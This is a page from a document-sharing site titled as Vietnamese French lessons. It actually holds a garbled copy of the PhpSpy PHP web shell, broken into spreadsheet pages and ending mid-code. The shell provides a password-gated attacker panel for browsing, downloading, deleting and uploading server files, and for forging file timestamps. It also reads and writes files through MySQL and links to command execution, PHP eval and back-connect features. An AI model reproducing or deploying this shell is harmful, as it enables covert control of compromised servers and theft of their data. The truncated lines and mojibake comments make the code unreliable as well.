bai giang tieng phap
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (196.88 KB, 198 trang )
Sheet1
Page 1
<?php
/*****************************************************************************
Codz by angel(4ngel)
Make in China
Web:
*****************************************************************************/
error_reporting(0);
@set_magic_quotes_runtime(false);
ob_start();
define('USER_AGENT'
if(!in_array(USER_AGENT
//header("HTTP/1.0 404 Not Found");die();
}
$mtime = explode(' '
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT'
//define('IS_WIN'
define('IS_WIN'
define('IS_COM'
define('IS_GPC'
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO'
@set_time_limit(0);
foreach(array('_GET'
foreach($$_request as $_key => $_value) {
if ($_key{0} != '_') {
if (IS_GPC) {
$_value = s_array($_value);
}
$$_key = $_value;
}
}
}
/*===================== ỗăồộỗẵđ =====================*/
$admin = array();
$admin['check'] = true;
$admin['pass'] = 'd3f63a529da93069958766a3d328226f';
//ồƯổăồạ cookie ọẵỗăốồổỗạổđốƯổ
// cookie ồỗẳ
$admin['cookiepre'] = '';
// cookie ọẵỗăồ
$admin['cookiedomain'] = '';
// cookie ọẵỗăốãồắ
$admin['cookiepath'] = '/';
// cookie ổổổ
$admin['cookielife'] = 86400;
// ổồƯộốƯồỗ ộêố
// ồƯổộốƯồỗ ộêố
Sheet1
Page 2
/*===================== ộỗẵđỗằổ =====================*/
if ($charset == 'utf8') {
header("content-Type: text/html; charset=utf-8");
} elseif ($charset == 'big5') {
header("content-Type: text/html; charset=big5");
} elseif ($charset == 'gbk') {
header("content-Type: text/html; charset=gbk");
} elseif ($charset == 'latin1') {
header("content-Type: text/html; charset=iso-8859-2");
}
$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();
/*===================== ốôọằẵộêố =====================*/
if ($action == "logout") {
scookie('phpspypass'
scookie('sql_query'
p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
exit;
}
if($admin['check']) {
if ($doing == 'login') {
$password = md5($password);
if ($admin['pass'] == $password) {
scookie('phpspypass'
p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
exit;
}
}
if ($_COOKIE['phpspypass']) {
if ($_COOKIE['phpspypass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== ộêốỗằổ =====================*/
$errmsg = '';
// ổƠỗPHPINFO
if ($action == 'phpinfo') {
if (IS_PHPINFO) {
phpinfo();
} else {
$errmsg = 'phpinfo() function has non-permissible';
}
}
// ọáốẵẵổọằả
if ($doing == 'downfile' && $thefile) {
Sheet1
Page 3
if (!@file_exists($thefile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$fileinfo = pathinfo($thefile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header('Content-Length: '.filesize($thefile));
@readfile($thefile);
exit;
}
}
if ($doing == 'downdir' && $thefile) {
if (!@file_exists($thefile)) {
$errmsg = 'The directory you want Downloadable was nonexistent';
} else {
$zip=new PHPZip($thefile);
$code=$zip->out;
header('Content-type: application/octet-stream');
header('Accept-Ranges: bytes');
header('Accept-Length: '.strlen($code));
header('Content-Disposition: attachment;filename='.end(explode('/'
echo $code;
exit;
}
}
// ỗổƠọáốẵẵồÔọằẵổổđồ
if ($doing == 'backupmysql' && !$saveasfile) {
dbconn($dbhost
$table = array_flip($table);
$result = q("SHOW tables");
if (!$result) p('<h2>'.mysql_error().'</h2>');
$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata .= sqldumptable($currow[0]);
}
}
mysql_close();
exit;
}
// ộốMYSQLọáốẵẵổọằả
if($doing=='mysqldown'){
if (!$dbname) {
$errmsg = 'Please input dbname';
} else {
dbconn($dbhost
if (!file_exists($mysqldlfile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
Sheet1
Page 4
$result = q("select load_file('$mysqldlfile');");
if(!$result){
q("DROP TABLE IF EXISTS tmp_angel;");
q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
$result = q("select content from tmp_angel");
q("DROP TABLE tmp_angel");
}
$row = @mysql_fetch_array($result);
if (!$row) {
$errmsg = 'Load file failed '.mysql_error();
} else {
$fileinfo = pathinfo($mysqldlfile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header("Accept-Length: ".strlen($row[0]));
echo $row[0];
exit;
}
}
}
}
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
<title></title>
<style type="text/css">
body
.input{font:12px Arial
.area{font:12px 'Courier New'
.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial
a {color: #00f;text-decoration:underline;}
a:hover{color: #f00;text-decoration:none;}
.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
.head td span{font-weight:normal;}
form{margin:0;padding:0;}
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
</style>
<script type="text/javascript">
function CheckAll(form) {
for(var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
}
function $(id) {
//ỗăổảộổổƠốĂăỗÔổêổ-
Sheet1
Page 5
return document.getElementById(id);
}
function goaction(act){
$('goaction').action.value=act;
$('goaction').submit();
}
</script>
</head>
<body style="margin:0;table-layout:fixed; word-break:break-all">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr class="head">
<td><span style="float:right;"><a onclick="javascript:alert('')" target="_blank"><?php echo str_replace('.'
</tr>
<tr class="alt1">
<td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>
<a href="javascript:goaction('logout');">Logout</a> |
<a href="javascript:goaction('file');">File Manager</a> |
<a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
<a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
<a href="javascript:goaction('shell');">Execute Command</a> |
<a href="javascript:goaction('phpenv');">PHP Variable</a> |
<a href="javascript:goaction('eval');">Eval PHP Code</a>
<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
</td>
</tr>
</table>
<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<?php
formhead(array('name'=>'goaction'));
makehide('action');
formfoot();
$errmsg && m($errmsg);
// ốãồồẵồốãồắ
!$dir && $dir = '.';
$nowpath = getPath(SA_ROOT
if (substr($dir
$dir = $dir.'/';
}
$uedir = ue($dir);
if (!$action || $action == 'file') {
$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
if ($doing == 'deldir' && $thefile) {
if (!file_exists($thefile)) {
m($thefile.' directory does not exist');
} else {
m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
// ồÔổ-ốằồổồà
// ồ ộÔỗđồẵ
Sheet1
Page 6
}
}
// ồồằỗđồẵ
elseif ($newdirname) {
$mkdirs = $nowpath.$newdirname;
if (file_exists($mkdirs)) {
m('Directory has already existed');
} else {
m('Directory created '.(@mkdir($mkdirs
@chmod($mkdirs
}
}
elseif ($doupfile) {
m('File upload '.(@copy($_FILES['uploadfile']['tmp_name']
}
// ỗẳốắổọằả
elseif ($editfilename && $filecontent) {
$fp = @fopen($editfilename
m('Save file '.(@fwrite($fp
@fclose($fp);
}
// ỗẳốắổọằảồổĐ
elseif ($pfile && $newperm) {
if (!file_exists($pfile)) {
m('The original file does not exist');
} else {
$newperm = base_convert($newperm
m('Modify file attributes '.(@chmod($pfile
}
}
// ổạồ
elseif ($oldname && $newfilename) {
$nname = $nowpath.$newfilename;
if (file_exists($nname) || !file_exists($oldname)) {
m($nname.' has already existed or original file does not exist');
} else {
m(basename($oldname).' renamed '.basename($nname).(@rename($oldname
}
}
// ồÔồảổọằả
elseif ($sname && $tofile) {
if (file_exists($tofile) || !file_exists($sname)) {
m('The goal file has already existed or original file does not exist');
} else {
m(basename($tofile).' copied '.(@copy($sname
}
}
// ồộổảộ
// ọáọẳ ổọằả
Sheet1
Page 7
elseif ($curfile && $tarfile) {
if (!@file_exists($curfile) || !@file_exists($tarfile)) {
m('The goal file has already existed or original file does not exist');
} else {
$time = @filemtime($tarfile);
m('Modify file the last modified '.(@touch($curfile
}
}
// ốêồđọạổảộ
elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
if (!@file_exists($curfile)) {
m(basename($curfile).' does not exist');
} else {
$time = strtotime("$year-$month-$day $hour:$minute:$second");
m('Modify file the last modified '.(@touch($curfile
}
}
// ổồọáốẵẵ
elseif($doing == 'downrar') {
if ($dl) {
$dfiles='';
foreach ($dl as $filepath => $value) {
$dfiles.=$filepath.'
}
$dfiles=substr($dfiles
$dl=explode('
$zip=new PHPZip($dl);
$code=$zip->out;
header('Content-type: application/octet-stream');
header('Accept-Ranges: bytes');
header('Accept-Length: '.strlen($code));
header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
echo $code;
exit;
} else {
m('Please select file(s)');
}
}
elseif($doing == 'delfiles') {
if ($dl) {
$dfiles='';
$succ = $fail = 0;
foreach ($dl as $filepath => $value) {
if (@unlink($filepath)) {
$succ++;
} else {
$fail++;
}
}
m('Deleted file have finishedùẳchoose '.count($dl).' success '.$succ.' fail '.$fail);
} else {
m('Please select file(s)');
// ổạộồ ộÔổọằả
Sheet1
Page 8
}
}
//æ“作完毕
formhead(array('name'=>'createdir'));
makehide('newdirname');
makehide('dir'
formfoot();
formhead(array('name'=>'fileperm'));
makehide('newperm');
makehide('pfile');
makehide('dir'
formfoot();
formhead(array('name'=>'copyfile'));
makehide('sname');
makehide('tofile');
makehide('dir'
formfoot();
formhead(array('name'=>'rename'));
makehide('oldname');
makehide('newfilename');
makehide('dir'
formfoot();
formhead(array('name'=>'fileopform'));
makehide('action');
makehide('opfile');
makehide('dir');
formfoot();
$free = @disk_free_space($nowpath);
!$free && $free = 0;
$all = @disk_total_space($nowpath);
!$all && $all = 0;
$used = $all-$free;
$used_percent = @round(100/($all/$free)
p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');
?>
<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
<form action="" method="post" id="godir" name="godir">
<tr>
<td nowrap>Current Directory (<?php echo $dir_writeable;?>
<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
<td nowrap><input class="bt" value="GO" type="submit"></td>
</tr>
</form>
</table>
<script type="text/javascript">
function createdir(){
var newdirname;
newdirname = prompt('Please input the directory name:'
if (!newdirname) return;
$('createdir').newdirname.value=newdirname;
$('createdir').submit();
Sheet1
Page 9
}
function fileperm(pfile){
var newperm;
newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:'
if (!newperm) return;
$('fileperm').newperm.value=newperm;
$('fileperm').pfile.value=pfile;
$('fileperm').submit();
}
function copyfile(sname){
var tofile;
tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):'
if (!tofile) return;
$('copyfile').tofile.value=tofile;
$('copyfile').sname.value=sname;
$('copyfile').submit();
}
function rename(oldname){
var newfilename;
newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:'
if (!newfilename) return;
$('rename').newfilename.value=newfilename;
$('rename').oldname.value=oldname;
$('rename').submit();
}
function dofile(doing
if (m && !confirm(m)) {
return;
}
$('filelist').doing.value=doing;
if (thefile){
$('filelist').thefile.value=thefile;
}
$('filelist').submit();
}
function createfile(nowpath){
var filename;
filename = prompt('Please input the file name:'
if (!filename) return;
opfile('editfile'
}
function opfile(action
$('fileopform').action.value=action;
$('fileopform').opfile.value=opfile;
$('fileopform').dir.value=dir;
$('fileopform').submit();
}
function godir(dir
if (view_writable) {
$('godir').view_writable.value=1;
}
$('godir').dir.value=dir;
$('godir').submit();
}
</script>
<?php
Sheet1
Page 10
tbhead();
p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
if ($view_writable) {
p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
} else {
p(' | <a href="javascript:godir(\''.$nowpath.'\'
}
p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
if (IS_WIN && IS_COM) {
$obj = new COM('scripting.filesystemobject');
if ($obj && is_object($obj)) {
$DriveTypeDB = array(0 => 'Unknow'
foreach($obj->Drives as $drive) {
if ($drive->DriveType == 2) {
p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).' Free:'.sizecount($drive->FreeSpace).' Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
} else {
p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
}
}
}
}
p('</td></tr></form>');
p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
//ổƠỗổổồồổọằảồỗđồẵ
$dirdata=array();
$filedata=array();
if ($view_writable) {
$dirdata = GetList($nowpath);
} else {
// ỗđồẵồốĂă
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$filepath=$nowpath.$file;
if(@is_dir($filepath)){
$dirdb['filename']=$file;
$dirdb['mtime']=@date('Y-m-d H:i:s'
$dirdb['dirchmod']=getChmod($filepath);
$dirdb['dirperm']=getPerms($filepath);
$dirdb['fileowner']=getUser($filepath);
$dirdb['dirlink']=$nowpath;
$dirdb['server_link']=$filepath;
$dirdb['client_link']=ue($filepath);
$dirdata[]=$dirdb;
} else {
$filedb['filename']=$file;
$filedb['size']=sizecount(@filesize($filepath));
$filedb['mtime']=@date('Y-m-d H:i:s'
$filedb['filechmod']=getChmod($filepath);
$filedb['fileperm']=getPerms($filepath);
$filedb['fileowner']=getUser($filepath);
Sheet1
Page 11
$filedb['dirlink']=$nowpath;
$filedb['server_link']=$filepath;
$filedb['client_link']=ue($filepath);
$filedata[]=$filedb;
}
}// while
unset($dirdb);
unset($filedb);
@closedir($dirs);
}
@sort($dirdata);
@sort($filedata);
$dir_i = '0';
foreach($dirdata as $key => $dirdb){
if($dirdb['filename']!=' ' && $dirdb['filename']!='.') {
$thisbg = bg();
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
p('<td nowrap>'.$dirdb['mtime'].'</td>');
p('<td nowrap> </td>');
p('<td nowrap>');
p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
p('<td nowrap><a href="javascript:dofile(\'downdir\'
p('</tr>');
$dir_i++;
} else {
if($dirdb['filename']==' ') {
p('<tr class='.bg().'>');
p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
p('</tr>');
}
}
}
p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
makehide('action'
makehide('thefile');
makehide('doing');
makehide('dir'
$file_i = '0';
foreach($filedata as $key => $filedb){
if($filedb['filename']!=' ' && $filedb['filename']!='.') {
$fileurl = str_replace(SA_ROOT
$thisbg = bg();
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
p('<td nowrap>'.$filedb['mtime'].'</td>');
p('<td nowrap>'.$filedb['size'].'</td>');
p('<td nowrap>');
p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
p('<td nowrap>');
Sheet1
Page 12
p('<a href="javascript:dofile(\'downfile\'
p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
p('<a href="javascript:opfile(\'editfile\'
p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
p('<a href="javascript:opfile(\'newtime\'
p('</td></tr>');
$file_i++;
}
}
p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
p('</form></table>');
}// end dir
elseif ($action == 'sqlfile') {
if($doing=="mysqlupload"){
$file = $_FILES['uploadfile'];
$filename = $file['tmp_name'];
if (file_exists($savepath)) {
m('The goal file has already existed');
} else {
if(!$filename) {
m('Please choose a file');
} else {
$fp=@fopen($filename
$contents=@fread($fp
@fclose($fp);
$contents = bin2hex($contents);
if(!$upname) $upname = $file['name'];
dbconn($dbhost
$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
}
}
}
?>
<script type="text/javascript">
function mysqlfile(doing){
if(!doing) return;
$('doing').value=doing;
$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
$('mysqlfile').charset.value=$('dbinfo').charset.value;
$('mysqlfile').submit();
}
</script>
<?php
!$dbhost && $dbhost = ($_COOKIE['dbhost']!=''?$_COOKIE['dbhost']:'localhost');
!$dbuser && $dbuser = ($_COOKIE['dbuser']!=''?$_COOKIE['dbuser']:'root');
!$dbport && $dbport = ($_COOKIE['dbport']!=''?$_COOKIE['dbport']:3306);
!$dbpass && $dbpass = ($_COOKIE['dbpass']!=''?$_COOKIE['dbpass']:'t00r');
!$dbname && $dbname = ($_COOKIE['dbname']!=''?$_COOKIE['dbname']:'information_schema');
!$charset && $charset = ($_COOKIE['charset']!=''?$_COOKIE['charset']:'');
Sheet1
Page 13
$charsets = array(''=>'Default'
formhead(array('title'=>'MYSQL Information'
makehide('action'
p('<p>');
p('DBHost:');
makeinput(array('name'=>'dbhost'
p(':');
makeinput(array('name'=>'dbport'
p('DBUser:');
makeinput(array('name'=>'dbuser'
p('DBPass:');
makeinput(array('name'=>'dbpass'
p('DBName:');
makeinput(array('name'=>'dbname'
p('DBCharset:');
makeselect(array('name'=>'charset'
p('</p>');
formfoot();
p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
p('<h2>Upload file</h2>');
p('<p><b>This operation the DB user must has FILE privilege</b></p>');
p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
p('<h2>Download file</h2>');
p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
makehide('dbhost');
makehide('dbport');
makehide('dbuser');
makehide('dbpass');
makehide('dbname');
makehide('charset');
makehide('doing');
makehide('action'
p('</form>');
}
elseif ($action == 'sqladmin') {
!$dbhost && $dbhost = ($_COOKIE['dbhost']!=''?$_COOKIE['dbhost']:'localhost');
!$dbuser && $dbuser = ($_COOKIE['dbuser']!=''?$_COOKIE['dbuser']:'root');
!$dbport && $dbport = ($_COOKIE['dbport']!=''?$_COOKIE['dbport']:3306);
!$dbpass && $dbpass = ($_COOKIE['dbpass']!=''?$_COOKIE['dbpass']:'t00r');
!$charset && $charset = ($_COOKIE['charset']!=''?$_COOKIE['charset']:'');
if($sql_query!=''){
scookie('sql_query'
}
$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
if(isset($dbhost)){
$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
}
if(isset($dbuser)) {
$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
}
if(isset($dbpass)) {
$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
}
if(isset($dbport)) {
$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
Sheet1
Page 14
}
if(isset($dbname)) {
$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
}
if(isset($charset)) {
$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
}
if ($doing == 'backupmysql' && $saveasfile) {
if (!$table) {
m('Please choose the table');
} else {
dbconn($dbhost
$table = array_flip($table);
$fp = @fopen($path
if ($fp) {
$result = q('SHOW tables');
if (!$result) p('<h2>'.mysql_error().'</h2>');
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0]
}
}
fclose($fp);
$fileurl = str_replace(SA_ROOT
m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
mysql_close();
} else {
m('Backup failed');
}
}
}
if ($insert && $insertsql) {
$keystr = $valstr = $tmp = '';
foreach($insertsql as $key => $val) {
if ($val) {
$keystr .= $tmp.$key;
$valstr .= $tmp."'".addslashes($val)."'";
$tmp = '
}
}
if ($keystr && $valstr) {
dbconn($dbhost
m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
}
}
if ($update && $insertsql && $base64) {
$valstr = $tmp = '';
foreach($insertsql as $key => $val) {
$valstr .= $tmp.$key."='".addslashes($val)."'";
$tmp = '
}
if ($valstr) {
$where = base64_decode($base64);
dbconn($dbhost
m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
Sheet1
Page 15
}
}
if ($doing == 'del' && $base64) {
$where = base64_decode($base64);
$delete_sql = "DELETE FROM $tablename WHERE $where";
dbconn($dbhost
m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
}
if ($tablename && $doing == 'drop') {
dbconn($dbhost
if (q("DROP TABLE $tablename")) {
m('Drop table of success');
$tablename = '';
} else {
m(mysql_error());
}
}
$charsets = array(''=>'Default'
formhead(array('title'=>'MYSQL Manager'));
makehide('action'
p('<p>');
p('DBHost:');
makeinput(array('name'=>'dbhost'
p(':');
makeinput(array('name'=>'dbport'
p('DBUser:');
makeinput(array('name'=>'dbuser'
p('DBPass:');
makeinput(array('name'=>'dbpass'
p('DBCharset:');
makeselect(array('name'=>'charset'
makeinput(array('name'=>'connect'
p('</p>');
formfoot();
?>
<script type="text/javascript">
function editrecord(action
if (action == 'del') {
if (!confirm('Is or isn\'t deletion record?')) return;
}
$('recordlist').doing.value=action;
$('recordlist').base64.value=base64;
$('recordlist').tablename.value=tablename;
$('recordlist').submit();
}
function moddbname(dbname) {
if(!dbname) return;
$('setdbname').dbname.value=dbname;
$('setdbname').submit();
}
function settable(tablename
if(!tablename) return;
Sheet1
Page 16
if (doing) {
$('settable').doing.value=doing;
}
if (page) {
$('settable').page.value=page;
}
$('settable').tablename.value=tablename;
$('settable').submit();
}
</script>
<?php
//æ“作记录
formhead(array('name'=>'recordlist'));
makehide('doing');
makehide('action'
makehide('base64');
makehide('tablename');
p($dbform);
formfoot();
//选定数æ®åº“
formhead(array('name'=>'setdbname'));
makehide('action'
p($dbform);
if (!$dbname) {
makehide('dbname');
}
formfoot();
//选定表
formhead(array('name'=>'settable'));
makehide('action'
p($dbform);
makehide('tablename');
makehide('page'
makehide('doing');
formfoot();
$cachetables = array();
$pagenum = 30;
$page = intval($page);
if($page) {
$start_limit = ($page - 1) * $pagenum;
} else {
$start_limit = 0;
$page = 1;
}
if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
dbconn($dbhost
//获å–æ•°æ®åº“ä¿¡æ¯
$mysqlver = mysql_get_server_info();
p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
$highver = $mysqlver > '4.1' ? 1 : 0;
//获å–æ•°æ®åº“
$query = q("SHOW DATABASES");
Sheet1
Page 17
$dbs = array();
$dbs[] = ' Select a database ';
while($db = mysql_fetch_array($query)) {
$dbs[$db['Database']] = $db['Database'];
}
makeselect(array('title'=>'Please select a database:'
$tabledb = array();
if ($dbname) {
p('<p>');
p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
if ($tablename) {
p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\'
}
p('</p>');
mysql_select_db($dbname);
$getnumsql = '';
$runquery = 0;
if ($sql_query) {
$runquery = 1;
}
$allowedit = 0;
if ($tablename && !$sql_query) {
$sql_query = "SELECT * FROM $tablename";
$getnumsql = $sql_query;
$sql_query = $sql_query." LIMIT $start_limit
$allowedit = 1;
}
p('<form name="form_sql_query" action="'.$self.'" method="POST">');
$sql_history = fetch_history($_COOKIE['sql_query']);
if(is_string($sql_history)) p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2"> Query history:</td></tr><tr><td>'.$sql_history.'</td></tr></table></p>');
p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query
makehide('tablename'
makehide('action'
p($dbform);
p('</form>');
if ($tablename || ($runquery && $sql_query)) {
if ($doing == 'structure') {
$result = q("SHOW COLUMNS FROM $tablename");
$rowdb = array();
while($row = mysql_fetch_array($result)) {
$rowdb[] = $row;
}
p('<table border="0" cellpadding="3" cellspacing="0">');
p('<tr class="head">');
p('<td>Field</td>');
p('<td>Type</td>');
p('<td>Null</td>');
p('<td>Key</td>');
p('<td>Default</td>');
p('<td>Extra</td>');
p('</tr>');
foreach ($rowdb as $row) {
$thisbg = bg();
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
p('<td>'.$row['Field'].'</td>');
Sheet1
Page 18
p('<td>'.$row['Type'].'</td>');
p('<td>'.$row['Null'].' </td>');
p('<td>'.$row['Key'].' </td>');
p('<td>'.$row['Default'].' </td>');
p('<td>'.$row['Extra'].' </td>');
p('</tr>');
}
tbfoot();
} elseif ($doing == 'insert' || $doing == 'edit') {
$result = q('SHOW COLUMNS FROM '.$tablename);
while ($row = mysql_fetch_array($result)) {
$rowdb[] = $row;
}
$rs = array();
if ($doing == 'insert') {
p('<h2>Insert new line in '.$tablename.' table »</h2>');
} else {
p('<h2>Update record in '.$tablename.' table »</h2>');
$where = base64_decode($base64);
$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
$rs = mysql_fetch_array($result);
}
p('<form method="post" action="'.$self.'">');
p($dbform);
makehide('action'
makehide('tablename'
p('<table border="0" cellpadding="3" cellspacing="0">');
foreach ($rowdb as $row) {
if ($rs[$row['Field']]) {
$value = htmlspecialchars($rs[$row['Field']]);
} else {
$value = '';
}
$thisbg = bg();
